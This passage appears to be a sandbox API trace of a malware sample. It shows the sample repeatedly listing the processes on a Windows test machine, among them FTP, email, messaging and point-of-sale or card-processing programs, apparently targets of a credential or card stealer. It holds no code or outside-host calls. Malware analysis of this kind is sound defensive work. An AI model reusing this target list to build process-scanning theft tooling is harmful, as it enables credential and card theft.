th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0264.139] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0264.141] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0264.142] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0264.144] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0264.146] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0264.147] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0264.149] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0264.150] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0264.205] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0264.206] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0264.208] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0264.209] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0264.212] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0264.214] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0264.218] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0264.220] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0264.221] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0264.223] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0264.225] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0264.226] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0264.228] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0264.233] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0264.235] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0264.237] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0264.239] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0264.241] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0264.243] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0264.244] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0264.253] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0264.255] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0264.257] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0264.259] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0264.267] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0264.274] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0264.277] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0264.280] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0264.283] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0264.284] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0264.286] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0264.288] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0264.289] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0264.291] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0264.342] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0264.344] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0264.346] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0264.348] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0264.349] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0264.351] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0264.352] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0264.405] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0264.407] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0264.409] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0264.410] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0264.412] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0264.414] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0264.416] CloseHandle (hObject=0x1018) returned 1 [0264.416] Sleep (dwMilliseconds=0x64) [0264.549] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0264.562] Process32First (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.563] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0264.565] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0264.566] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0264.567] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0264.569] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0264.570] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0264.572] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0264.574] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0264.577] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.579] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.580] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0264.581] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.583] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.584] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.586] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.588] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.609] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.611] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.612] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0264.613] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0264.615] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0264.616] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.618] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0264.619] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0264.624] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0264.625] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0264.626] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0264.628] Process32Next 